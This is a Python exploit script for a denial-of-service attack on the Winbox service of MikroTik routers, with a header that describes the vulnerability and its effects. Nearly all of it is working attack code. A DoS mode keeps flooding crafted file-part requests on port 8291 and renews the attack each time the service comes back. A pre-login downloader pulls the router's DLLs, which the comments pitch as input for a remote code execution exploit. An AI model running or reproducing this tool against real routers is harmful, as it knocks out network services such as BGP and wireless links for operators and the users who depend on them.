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#!/usr/bin/python # Exploit Title: Mikrotik Router Remote Denial Of Service attack # Date: 19/4/2012 # Author: PoURaN @ 133tsec.com # Software Link: http://www.mikrotik.com # Version: All mikrotik routers with winbox service enabled are affected (still a 0day 30/5/2012) # Tested on: Mikrotis RouterOS 2.9.6 up to 5.15 # # Vulnerability Description # =========================== # DETAILS & PoC VIDEO : http://www.133tsec.com/2012/04/30/0day-ddos-mikrotik-server-side-ddos-attack/ # The denial of service, happens on mikrotik router's winbox service when # the attacker is requesting continuesly a part of a .dll/plugin file, so the service # becomes unstable causing every remote clients (with winbox) to disconnect # and denies to accept any further connections. That happens for about 5 minutes. After # the 5 minutes, winbox is stable again, being able to accept new connections. # If you send the malicious packet in a loop (requesting part of a file right after # the service becoming available again) then you result in a 100% denial of winbox service. # While the winbox service is unstable and in a denial to serve state, it raises router's CPU 100% # and other actions. The "other actions" depends on the router version and on the hardware. # For example on Mikrotik Router v3.30 there was a LAN corruption, BGP fail, whole router failure # => Mikrotik Router v2.9.6 there was a BGP failure # => Mikrotik Router v4.13 unstable wifi links # => Mikrotik Router v5.14/5.15 rarely stacking # =>>> Behaviour may vary most times, but ALL will have CPU 100% . Most routers loose BGP after long time attack <<<= # # # The exploit # ============= # This is a vulnerability in winbox service, exploiting the fact that winbox lets you download files/plugins # that winbox client needs to control the server, and generally lets you gain basic infos about the service BEFORE # user login! # Sending requests specially crafted for the winbox service, can cause a 100% denial of winbox service (router side). # This script, offers you the possibility to download any of the dlls that can be downloaded from the router one-by-one # or alltogether! (look usage for more info) .. The file must be contained in the router's dll index. # The dlls downloaded, are in the format of the winbox service.. Meaning that they are compressed with gzip and they # have 0xFFFF bytes every 0x101 bytes (the format that winbox client is expecting the files) # These DLLs can be used by the "Winbox remote code execution" exploit script ;) # # Usage # ======= # Use the script as described below: # 1. You can download ALL the files of the router's dll index using the following command: # python mkDl.py 10.0.0.1 * 1 # the "1" in the end, is the speed.. "Speed" is a factor I added, so the script delays a bit while receiving # information from the server. It is a MUST for remote routers when they are in long distance (many hops) to use # a slower speed ( 9 for example ). # Also in the beginning of the dlls file list, script shows you the router's version (provided by router's index) # 2. You can download a specific .dll file from the remote router. # python mkDl.py 10.67.162.1 roteros.dll 1 # In this example i download roteros.dll (which is the biggest and main plugin) with a speed factor of 1 (very fast) # Because roteros and 1-2 other files are big, you have to request them in different part (parts of 64k each) # That is a restriction of winbox communication protocol. # If you don't know which file to request, make a "*" request first (1st usage example), see the dlls list, and press ctrl-c # to stop the script. # 3. You can cause a Denial Of Service to the remote router.. Means denial in winbox service or more (read above for more) # python mkDl.py 10.67.162.1 DoS # This command starts requesting from router's winbox service the 1st part of roteros.dll looping the request # and causing DoS to the router. The script is requesting the file till the router stops responding to the port (8291) # Then it waits till the service is up again (using some exception handling), then it requests again till the remote # service is down again etc etc... The requests lasts for about 2 seconds, and the router is not responding for about # 5 minutes as far as i have seen from my tests in different routeros versions. # # <> Greetz to mbarb, dennis, andreas, awmn and all mighty researchers out there! keep walking guys <> # import socket, sys, os, struct, random, time
def InitConnection(mikrotikIP, speed): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((mikrotikIP, 8291)) s.send(winboxStartingIndex) data = s.recv(1024) # receiving dll index from server time.sleep(0.001*speed) if data.find("\xFF\x02"+"index"+"\x00") > -1: print "[+] Index received!" else: print "[+] Wrong index.. Exiting.." sys.exit(0) return s
def download(filename, speed, s): f = open(filename, 'wb') if len(filename) < 13 and len(filename) > 6: print "[+] Requesting file ", filename, ' <->' winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter s.send(winboxStartingFileReq) time.sleep(0.001*speed) dataReceived = s.recv(1) if dataReceived[0:1]=='\xFF': print "[+] Receiving the file..." f.write(dataReceived) # written 1st byte time.sleep(0.001*speed) dataReceived = s.recv(0x101) # 0x100 + 1 nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] if dataReceived[0:1]=='\x02': time.sleep(0.001*speed) f.write(dataReceived) # written 1st chunk 0x102 bytes with header in file. dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2 f.write(dataReceived) # write the next 0x102 bytes (total 0x102+0x102 in file) else: print "[-] Wrong data received..(2)" sys.exit(0) else: print "[-] Wrong data received..(1)" sys.exit(0) finalPart=0 bigFileCounter = 0xFFED packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0 fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter. while 1: # header of file done.. Now LOOP the body.. packetsCounted+=1 # dbg time.sleep(0.001*speed) dataReceived = s.recv(bytesToRead) f.write(dataReceived) if (bytesToRead <> len(dataReceived)) and packetsCounted==255: # an den diavazei osa bytesToRead prepei, simainei oti eftase sto telos i lipsi tou part pou katevazoume packetsCounted = -1 print '[+] Next file part : ', fileRequested s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter)) time.sleep(0.001*speed) dataReceived = s.recv(0x101 + 2) # Reads the new header of the new part!!! nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] f.write(dataReceived) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) fileRequested += 1 bigFileCounter -= 0x13 bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) # den prostheto 2 tora giati to teleutaio den einai ff.. einai akrivos to size pou paramenei.. if bytesToRead==0xFF: # kalipto tin periptosi opou to teleutaio struct den einai ff alla exei to size pou apomenei bytesToRead += 2 if bytesToRead != 0x101 and nextPartFingerprint < 65517: # dikaiologountai ta liga bytes otan teleiose ena apo ta parts tou file time.sleep(0.001*speed) dataReceived = s.recv(bytesToRead) f.write(dataReceived) break if bytesToRead != 0x101 and nextPartFingerprint==65517: # ligotera bytes KAI fingerprint 65517 simainei corrupted file.. print '[-] File download terminated abnormaly.. please try again probably with a slower speed..' sys.exit(0) if fileRequested < 1: print '[+] File was small and was downloaded in one part\n[+] Downloaded successfully' else: print '[+] File '+filename+' downloaded successfully' f.close() s.close()
def Flood(s): filename = 'roteros.dll' f = 'we\'r not gonna use I/O to store the data' print "[+] Requesting file ", filename, ' till death :)' time.sleep(1) winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter s.send(winboxStartingFileReq) time.sleep(0.001) dataReceived = s.recv(1) if dataReceived[0:1]=='\xFF': f = dataReceived # written 1st byte time.sleep(0.001) dataReceived = s.recv(0x101) # 0x100 + 1 nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0] if dataReceived[0:1]=='\x02': time.sleep(0.001) f = dataReceived # written 1st chunk 0x102 bytes with header in file. dataReceived = s.recv(0x102) # 1st sequence of (0xFF 0xFF) bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2 f = dataReceived # write the next 0x102 bytes (total 0x102+0x102 in file) else: print "[-] Wrong data received..(2)" sys.exit(0) else: print "[-] Wrong data received..(1)" sys.exit(0) finalPart=0 bigFileCounter = 0xFFED packetsCounted=0 # counter for the 0x101 packet counts. Every time a file is requested this counter is 0 fileRequested=0 # every time a file needs to be requested more than 1 time, this is it's counter. try: while 1: s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) + struct.pack('>h',bigFileCounter)) s.recv(1) print '- Sending evil packet.. press CTRL-C to stop -' except: print 'Connection reseted by server.. trying attacking again'
############################################################################################################### ########################################### SCRIPT BODY STARTS HERE ########################################### global RequestHeader RequestHeader = ('\x12\x02') global RequestFirstFooter RequestFirstFooter = ('\xFF\xED\x00\x00\x00\x00')
global winboxStartingIndex winboxStartingIndex=(RequestHeader + 'index' + '\x00'*7 + RequestFirstFooter) winboxStartingFileReq=(RequestHeader + '\x00'*12 + RequestFirstFooter)
print '\n[Winbox plugin downloader]\n\n'
if len(sys.argv)==3: if sys.argv[2]=='DoS': # if i combine both checks in 1st if, there will be error.. guess why.. ;) print '[+] Hmmm we gonna attack it..' time.sleep(1) speed=1 mikrotikIP = sys.argv[1] filename = sys.argv[2] while 1: time.sleep(1) try: s = InitConnection(mikrotikIP, speed) Flood(s) except: time.sleep(1)
if len(sys.argv)<>4: print 'Usage : '+sys.argv[0]+' <mikrotik_ip> <filename_to_download> <speed>\n\t<speed>:\t [from 0 to 9] 1=faster, 9=slower but more reliable\n' sys.exit(0)
mikrotikIP = sys.argv[1] filename = sys.argv[2] speed = int(sys.argv[3]) if speed>9 or speed<1: print 'Speed must be between 1 and 9 else there are unexpected results!' sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((mikrotikIP, 8291)) s.send(winboxStartingIndex) data = s.recv(1024) # receiving dll index from server s.close()
if filename.find('*') > -1: DllList = data.split('\x0a') print 'Mikrotik\'s version is '+DllList[1].split(' ')[3]+'\nThe following Dlls gonna be requested :' for i in range(0, len(DllList)-1): print DllList[i].split(' ')[2] raw_input('> Press enter to continue <') for extractedDlls in range(0, len(DllList)-1): print "[+] Requesting ", DllList[extractedDlls].split(' ')[2] filename=DllList[extractedDlls].split(' ')[2] s = InitConnection(mikrotikIP, speed) download(filename, speed, s) else: s = InitConnection(mikrotikIP, speed) download(filename, speed, s)
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